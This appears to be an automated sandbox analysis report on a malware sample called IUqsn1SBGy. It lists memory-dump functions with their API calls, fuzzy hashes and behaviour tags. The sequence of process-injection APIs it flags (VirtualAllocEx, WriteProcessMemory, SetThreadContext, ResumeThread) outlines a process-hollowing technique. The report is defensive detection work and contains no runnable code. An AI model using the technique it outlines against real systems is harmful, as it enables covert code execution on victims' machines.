Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09FC3B48

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f10095db27d2b788a67e84afc95f0b4b3d7dd2f94ba22ea293c64e6f91a97428
Instruction ID: 9f0eb11b3ce6cf91389dcb69ec9b2c3864e51c2b8292a98e9dc632d8a0f33193
Opcode Fuzzy Hash: f10095db27d2b788a67e84afc95f0b4b3d7dd2f94ba22ea293c64e6f91a97428
Instruction Fuzzy Hash: F82113B5D002499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7250D7789945CBA0

Function 0A56BD91 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0A56BE2F

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: cdd46cc2f6635660350ba96b614c8c9398906c09f8bbb424793d3bd5030f34ea
Instruction ID: fe90b10004b4efe8dd27bd07cc2445958830e3a30016ad6fb34aceb2443de6a1
Opcode Fuzzy Hash: cdd46cc2f6635660350ba96b614c8c9398906c09f8bbb424793d3bd5030f34ea
Instruction Fuzzy Hash: FE31DDB5D002499FDB10CF9AD884AAEFBF5FB48310F15842EE919A7210D374A944CFA0

Function 0A56BD98 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0A56BE2F

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 5fed2675eaed00c86d112bc5c0b5fc98ef7b3a0bf59e0a0868ab723de1b698f5
Instruction ID: c53a81d79a6a35e1f09e39845b13d9290ca93b06819047688613054cec2efedb
Opcode Fuzzy Hash: 5fed2675eaed00c86d112bc5c0b5fc98ef7b3a0bf59e0a0868ab723de1b698f5
Instruction Fuzzy Hash: FA21DFB5D002499FDB10CF9AD884A9EFBF5FF48320F15842AE919A7310D775A944CFA0

Function 09FC3AB8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09FC3B48

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f90b24fe291f6ab4cfb5be316b57d67afefa5a88c371af9aff15a6788ff2938a
Instruction ID: ff53d8e2eca704ea7b08af6ebba85843e1073976a48f4d159d95d0adadbdc3eb
Opcode Fuzzy Hash: f90b24fe291f6ab4cfb5be316b57d67afefa5a88c371af9aff15a6788ff2938a
Instruction Fuzzy Hash: 6D2116B5D003499FCB10DFAAC985BEEBBF5FF48314F10842AE919A7240D7789945CBA4

Function 09FC3BA0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09FC3C28

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 31ad8a02b6b04d826889b387627b8bc91e4deb6ee4f64d8ff54faaa5fd9875fd
Instruction ID: e24a2f004f1b1fe17b74cdba8fb51491e0d6dd236f7c1b80f0ef3501335360d4
Opcode Fuzzy Hash: 31ad8a02b6b04d826889b387627b8bc91e4deb6ee4f64d8ff54faaa5fd9875fd
Instruction Fuzzy Hash: B92116B1D002499FCB10DFAAC985AEEBBF5FF88310F50842EE519A7250D7789945CBA0

Function 09FC3919 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09FC399E

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 263d4e6d767a8813bf516cc036f810a2699751d7144723646e5e642d45e4e004
Instruction ID: 9ca563fa4d52d79dbe2436f31eb44216ea15219b5363ee744a37744c2abdc8ea
Opcode Fuzzy Hash: 263d4e6d767a8813bf516cc036f810a2699751d7144723646e5e642d45e4e004
Instruction Fuzzy Hash: 072123B1D002098FCB10DFAAC5857EEBBF5AB88354F10C42AD459A7240CB789945CFA1

Function 09FC3920 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09FC399E

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 75adc6f618d9cff4113afb42ef52dd87d29ab7c85eac2879fb5fbc968f8dfe69
Instruction ID: 8c89e0f9bdf7a508c8708535e7af49427011d72b202a502e269da1644212e97c
Opcode Fuzzy Hash: 75adc6f618d9cff4113afb42ef52dd87d29ab7c85eac2879fb5fbc968f8dfe69
Instruction Fuzzy Hash: D72134B1D002098FDB10DFAAC5857EEBBF5EF89354F14C42AD459A7240CB78A945CFA1

Function 09FC3BA8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09FC3C28

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 16d5c6c10965df7ef3fd7cf7c349955beaeca2be4722ed61978a9a8609191292
Instruction ID: f11d498edc976c8250dd795e47b24804b2b462616cdb5814b78de3bd0730c281
Opcode Fuzzy Hash: 16d5c6c10965df7ef3fd7cf7c349955beaeca2be4722ed61978a9a8609191292
Instruction Fuzzy Hash: 8E21F5B1C002499FCB10DFAAC985AEEFBF5FF48310F50842AE519A7250DB799945CBA1

Function 09E37B88 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 09E37C03

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5c707869636556d14093d97bec3e8f68f17fe14973945e577f34cc577bf566f0
Instruction ID: 5988033b8810a99dc32a4e6bb54f21967d1ec9c38eb9a1d54d0ae99c7e899493
Opcode Fuzzy Hash: 5c707869636556d14093d97bec3e8f68f17fe14973945e577f34cc577bf566f0
Instruction Fuzzy Hash: B72106B59002499FCB10DFAAC985AEEFBF4FF48310F10842AE559A7251D379A944CFA1

Function 0A56AD44 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0A56CAAA,?,?,?,?,?), ref: 0A56CB4F

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 4def56ec3a2485192343243b64e56f19304d9c8e0cee0e0776df8355367ca77a
Instruction ID: 29bc6d3e25f28699130994bc10bb03a47993428c1f60df50264459feb7a9aef6
Opcode Fuzzy Hash: 4def56ec3a2485192343243b64e56f19304d9c8e0cee0e0776df8355367ca77a
Instruction Fuzzy Hash: 78113AB58002499FDB10DF9AC845BDEBFF8FB48310F14841AE555A7250C379A954DFA4

Function 09FC39F1 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09FC3A66

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2156a703e8a41b68270015af9748d9eac6c3cf868765a79459c7c9bb49f3e2ad
Instruction ID: 7ce49ccfa594a760feb48629dc3011c9ad3d454edd6c41b9d26599c4b2d942b5
Opcode Fuzzy Hash: 2156a703e8a41b68270015af9748d9eac6c3cf868765a79459c7c9bb49f3e2ad
Instruction Fuzzy Hash: 11115975C002499FCB14DFA9C845AEEBFF5EF88310F10C41AE519A7250C77A9554CFA0

Function 09E37B90 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 09E37C03

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3a486a03b70fddac64b5ae847af3c0657ae2bde0b71027d9a66ee52e0ca6e308
Instruction ID: e26f1e6d14632f0c4aa5b131cff29d79b5c8e835f9c90ec6bd13d73c885a93f5
Opcode Fuzzy Hash: 3a486a03b70fddac64b5ae847af3c0657ae2bde0b71027d9a66ee52e0ca6e308
Instruction Fuzzy Hash: 3A2126B59002499FCB10DFAAC884BDEFBF4FF48320F108429E958A7251D379A944CFA1

Function 09FC39F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09FC3A66

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 909a0a9fe55f496f403bff772c223961065a2c73a0f67303d7c177424ad87af4
Instruction ID: 2c1e72498f1549fe09293711dc0a479f01d20626ccbcb20515853ef6e6802b53
Opcode Fuzzy Hash: 909a0a9fe55f496f403bff772c223961065a2c73a0f67303d7c177424ad87af4
Instruction Fuzzy Hash: C61137B58002499FCB10DFAAC844AEEBFF5EF48320F148419E519A7250CB79A554CFA0

Function 09FC3430 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09FC349A

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f199fc07e4e6a0d0dbf39fb08f38953749737f566ddab9ed59b241de7a768b21
Instruction ID: f0ab34cae390b497899cba57e2ccc35a2aed6d0b4a2da768f895005d3c83de58
Opcode Fuzzy Hash: f199fc07e4e6a0d0dbf39fb08f38953749737f566ddab9ed59b241de7a768b21
Instruction Fuzzy Hash: DE1137B1D002498ECB20DFA9D4457EEBBF4AB88314F20C81AD419A7240C7789545CFA4

Function 09FC3438 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09FC349A

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 658d927b65cea838b3a0855a6bdc6a83abd1b836154c5c66690d8b71aba3bf9d
Instruction ID: 4a355b318bc39462537ed1778e9b1f2b595b222b4cd4ece9b21410700a39a271
Opcode Fuzzy Hash: 658d927b65cea838b3a0855a6bdc6a83abd1b836154c5c66690d8b71aba3bf9d
Instruction Fuzzy Hash: AB1128B1D002498BCB10DFAAC4457EEFBF5EF88314F248419D519A7240CB79A944CBA5

Function 09FC7038 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09FC709D

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6e285ec9aa47ef925b3ecbf105a9ed1e68b9e9e414d3c91a39ec4bbe15c71203
Instruction ID: 7042a1d9905b8dd8066a5bfac01ea3064a2c54044ebfc27a394a9abc122fef13
Opcode Fuzzy Hash: 6e285ec9aa47ef925b3ecbf105a9ed1e68b9e9e414d3c91a39ec4bbe15c71203
Instruction Fuzzy Hash: 5D11F2B58003499FCB60EF9AD985BDEFBF8EB48320F108419E518A7240C379A544CFA1

Function 0177E4C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0177E526

Memory Dump Source

Source File: 00000000.00000002.2121325778.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_IUqsn1SBGy.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ecd44af7fc4c15cbfb44e69f209d4411675eb4a4cb41c6c5dd5e1116ddc3e4da
Instruction ID: d0b2ff35e68861f9c6c69e99171cfe31200a86b261617bc659ea66c7c7bf85d3
Opcode Fuzzy Hash: ecd44af7fc4c15cbfb44e69f209d4411675eb4a4cb41c6c5dd5e1116ddc3e4da
Instruction Fuzzy Hash: 201110B5C002498FDB10DF9AD844ADEFBF8EF88314F20846AD519B7200E379A545CFA1

Function 09FC06B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09FC709D

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 11c9baf9fddefa6475187b2290a70d60a60d196a5a148afcbadd065f57a04744
Instruction ID: 5216d3688cb5c8d120e6410ef53e1512cc34fc69d141d3134a39f18a84bfb103
Opcode Fuzzy Hash: 11c9baf9fddefa6475187b2290a70d60a60d196a5a148afcbadd065f57a04744
Instruction Fuzzy Hash: 6011F5B58003499FDB10DF9AC984BDEBBF8EB48310F108459E919A7240C379A944CFA5

Function 0172D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121048132.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_172d000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79796196f1ae821eeb293a03aba817d97d42cb1614f4799a6e59948e0a5a0bf0
Instruction ID: 1b0b83c72ea83cde9ba522fef5e04899b45c58e96c438da3546eaa8f65649348
Opcode Fuzzy Hash: 79796196f1ae821eeb293a03aba817d97d42cb1614f4799a6e59948e0a5a0bf0
Instruction Fuzzy Hash: 1A210471508204EFDB25DFA8D9C0F26FBA5FB89324F20C5ADE9094B256C33AD407CA61

Function 0172D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121048132.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_172d000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a31b9b9c930e2070b5609c47be787fa438ba8351b8e34740660dc122eda318
Instruction ID: 5beac0ddc472306ae43504a80c7b58be58615397e6bd971e7255124505de0e8c
Opcode Fuzzy Hash: 07a31b9b9c930e2070b5609c47be787fa438ba8351b8e34740660dc122eda318
Instruction Fuzzy Hash: 50210071604244DFCB35DFA8D984B26FF65EB88314F20C5ADD90A0B2A6C33ED407CAA1

Function 0172D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121048132.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_172d000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: fe9767f35686b4b55b542451495c924f8131ef85a34eae459185eda5a4d1d663
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 1411DD75504280CFDB22CF58D5C4B15FFA2FB88314F24C6AAD8494B666C33AD40BCBA2

Function 0172D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121048132.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_172d000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 9fbdd4930d356cf84f25f00e4ad12dda3bca6fde5e8f9aee875f4ef349fa9b79
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 2D11BB75508280DFDB12CF54C5C4B15FFA1FB85224F24C6A9D8498B296C33AD40ACB62

Function 0154D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120649490.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_154d000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723f01b501ec3291572a4d139cff54279504448a58560130b50de76cff8abf11
Instruction ID: 951f099df4f118cca0224170771896007cb16f844cd7fa80b652259ecf8fb4a5
Opcode Fuzzy Hash: 723f01b501ec3291572a4d139cff54279504448a58560130b50de76cff8abf11
Instruction Fuzzy Hash: 4201FC310043809BE710CA59CD84B56BFECFF55368F18C929ED090E286C2399400CA71

Function 0154D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120649490.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_154d000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4dba3bc045e49966281cc0fedabd2cc947fa3239c3c92e386d1a50e714a561f
Instruction ID: 799b551a5059d5bff006a04c2a33d4db7a4d0bbdb83a36511465afb0cfd814b9
Opcode Fuzzy Hash: f4dba3bc045e49966281cc0fedabd2cc947fa3239c3c92e386d1a50e714a561f
Instruction Fuzzy Hash: 81F062714053849BE7118E1ACC88B66FFA8EF55678F18C45AED484E386C2799844CAB1

Non-executed Functions

Function 0A562C38 Relevance: 8.0, Strings: 6, Instructions: 527COMMON

Download Yara Rule

Strings

4']q, xrefs: 0A562C53
4|bq, xrefs: 0A562E43
4']q, xrefs: 0A562CAE
$]q, xrefs: 0A562D00
4|bq, xrefs: 0A562E28
4']q, xrefs: 0A562CDE

Memory Dump Source

Source File: 00000000.00000002.2129631396.000000000A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a560000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4|bq$4|bq$$]q
API String ID: 0-3260684265
Opcode ID: 480500cbdb146b60a4e49fa0c602570dfd3d3105716e9de5147604b7714cca8f
Instruction ID: e2e2868f083ad3420f69fbda23507be0d193ba555156e4671be52404774ba555
Opcode Fuzzy Hash: 480500cbdb146b60a4e49fa0c602570dfd3d3105716e9de5147604b7714cca8f
Instruction Fuzzy Hash: C602C331B002159FCB29DF69C894A6E7BA6BFC9710B2684A9D406DB361CF35DC42CB91

Function 09E3A438 Relevance: 1.6, Strings: 1, Instructions: 331COMMON

Download Yara Rule

Strings

{#L, xrefs: 09E3A620

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: {#L
API String ID: 0-1361971085
Opcode ID: 2c98b041382766140564bdad8d0af81f209300d82d94d504ced203fc6c29d41a
Instruction ID: d262d752c0f7824d60edc7985ac8870d7d9641c353d0ef64e94674cb1e74ff0e
Opcode Fuzzy Hash: 2c98b041382766140564bdad8d0af81f209300d82d94d504ced203fc6c29d41a
Instruction Fuzzy Hash: 70D12670E05219DFCB18CFAAC58459EFBF2BF88350F54E52AD456AB225DB309942CF11

Function 09FC1538 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

V, xrefs: 09FC1706

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-2420206911
Opcode ID: a48caf3f7d9cc60bcac6b6093aa33fef3fc6f5212e91de19c166fc48d5ea4a96
Instruction ID: 189f2eab38d7af096ec3310ef47d82be586d6d97ff99c8aec9d75f3c4bc916ad
Opcode Fuzzy Hash: a48caf3f7d9cc60bcac6b6093aa33fef3fc6f5212e91de19c166fc48d5ea4a96
Instruction Fuzzy Hash: 82E1D7B4E041598FCB14CFA9C5809AEBBF2FF89305F24C269E414AB356DB31A941CF61

Function 09FC34E8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

Di, xrefs: 09FC36B3

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: Di
API String ID: 0-3649076471
Opcode ID: 8fd0b63e46eb5690465b1cca362a9ceb1d096964a543c637fe07632e00205e7e
Instruction ID: fe63bec2ba107ea7b2dc47209eb63fd3f47ad7afd402f5651586237d36b54d51
Opcode Fuzzy Hash: 8fd0b63e46eb5690465b1cca362a9ceb1d096964a543c637fe07632e00205e7e
Instruction Fuzzy Hash: 06E1D7B4E001598FCB14CFA9C5809AEBBB2FF89345F24C169E414AB356DB71A941CFA1

Function 09FC2C10 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

xe, xrefs: 09FC2DDB

Memory Dump Source

Source File: 00000000.00000002.2129488484.0000000009FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9fc0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: xe
API String ID: 0-1875400224
Opcode ID: ca7b28ce52b8d423fffb895d2b873a4d7b8ef95e03e9a4f03cf491a4658db79d
Instruction ID: 2417ce1ef0fabec362efd014612c950d2dce95e70c3228b200c22ed79f3eafae
Opcode Fuzzy Hash: ca7b28ce52b8d423fffb895d2b873a4d7b8ef95e03e9a4f03cf491a4658db79d
Instruction Fuzzy Hash: 0BE1D7B4E001598FCB14CFA9C5809AEBBF2FF89315F24C269E414AB356DB31A941CF61

Function 09E318D8 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

98R, xrefs: 09E31A43

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: 98R
API String ID: 0-576591972
Opcode ID: f6cd5234468654688554c358a21b53f1d3c612650f5dbdddd8638c863009caad
Instruction ID: fd549f438630e9d1a3c7e5027688bb7b9c685975cb3515bc73c389a11b744634
Opcode Fuzzy Hash: f6cd5234468654688554c358a21b53f1d3c612650f5dbdddd8638c863009caad
Instruction Fuzzy Hash: 0F7123B4E0920ADFCB08CFA9D4859EEBBB1FF89350F54D52AD415AB214D3349A42CF94

Function 09E38559 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

iUfo, xrefs: 09E3867E

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: iUfo
API String ID: 0-3820436262
Opcode ID: 23cb14187929f02e159b35ba40e75e5232c4e93c2e9fab039ba863154ec8c353
Instruction ID: 53aaab132ac8eafd0dcbab989400e16f13f7e7f7a09bdec102eeed7f1f2ef581
Opcode Fuzzy Hash: 23cb14187929f02e159b35ba40e75e5232c4e93c2e9fab039ba863154ec8c353
Instruction Fuzzy Hash: 7951E4B4E052199FCB08CFA9D9456DEBBF2BF88340F10D12AE405F7250E7349A41CB55

Function 09E38568 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

iUfo, xrefs: 09E3867E

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: iUfo
API String ID: 0-3820436262
Opcode ID: a96bb61877955d0470821c09975fb364c2ddc77eef43d769ef2150872e9cfb6e
Instruction ID: 6360e54445792ce934f24502df5430101e0c1bbfc7f84a900df998042fb11406
Opcode Fuzzy Hash: a96bb61877955d0470821c09975fb364c2ddc77eef43d769ef2150872e9cfb6e
Instruction Fuzzy Hash: 1951E3B4E052199FCB04CFAAD9496EEFBF2BB88340F10D52AE406B7254E7349941CF55

Function 09E338A0 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

l|, xrefs: 09E338EB

Memory Dump Source

Source File: 00000000.00000002.2129275115.0000000009E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e30000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: l|
API String ID: 0-1955549514
Opcode ID: 195679dea48472a1d89aa36c01275d11ab5395d227f364878b5192ead149b039
Instruction ID: 8d095ef67be7f33f2490a13b402faf589c4867041e12dec823aae49b3a174a34
Opcode Fuzzy Hash: 195679dea48472a1d89aa36c01275d11ab5395d227f364878b5192ead149b039
